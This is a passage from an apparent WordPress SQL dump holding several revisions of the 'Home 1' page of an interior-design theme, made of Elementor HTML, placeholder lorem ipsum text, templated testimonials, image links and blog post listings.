										Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://demo.ovatheme.com/retirio/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://demo.ovatheme.com/retirio/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://demo.ovatheme.com/retirio/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://demo.ovatheme.com/retirio/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://demo.ovatheme.com/retirio/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://demo.ovatheme.com/retirio/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://demo.ovatheme.com/retirio/is-architecture-a-good-career/\" rel=\"bookmark\" title=\"Is architecture a good career?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-01.jpg\" alt=\" Is architecture a good career?\">\n							</a>\n									23\n									June\n										<a href=\"https://demo.ovatheme.com/retirio/is-architecture-a-good-career/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://demo.ovatheme.com/retirio/is-architecture-a-good-career/\" rel=\"bookmark\" title=\"Is architecture a good career?\">\n								Is architecture a good career?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2022-11-25 07:38:19','2022-11-25 07:38:19','',22,'https://bauhaus.futuremediatrix.com/?p=4735',0,'revision','',0),(4736,1,'2022-11-25 07:38:19','2022-11-25 07:38:19','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT INTERIOR</h3>\n														<h2>\n								We provide the best\narchitect & interior\ndesign services							</h2>\n		Our signature design process comes standard…refresh, remodel, new and enjoyable design experienceDuis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More Detail\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n		<p>Trust the experts for all your <strong style=\"color: #242424;\">architects &amp; interior needs.</strong></p>		\n			<a href=\"https://demo.ovatheme.com/retirio/services/\" role=\"button\">\n						More Service\n					</a>\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2022-11-25 07:38:19','2022-11-25 07:38:19','',22,'https://bauhaus.futuremediatrix.com/?p=4736',0,'revision','',0),(4737,1,'2022-11-25 07:40:13','2022-11-25 07:40:13','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT INTERIOR</h3>\n														<h2>\n								We provide the best\narchitect & interior\ndesign services							</h2>\n		Our signature design process comes standard…refresh, remodel, new and enjoyable design experienceDuis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More Detail\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n		<p>Trust the experts for all your <strong style=\"color: #242424;\">architects &amp; interior needs.</strong></p>		\n			<a href=\"https://demo.ovatheme.com/retirio/services/\" role=\"button\">\n						More Service\n					</a>\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 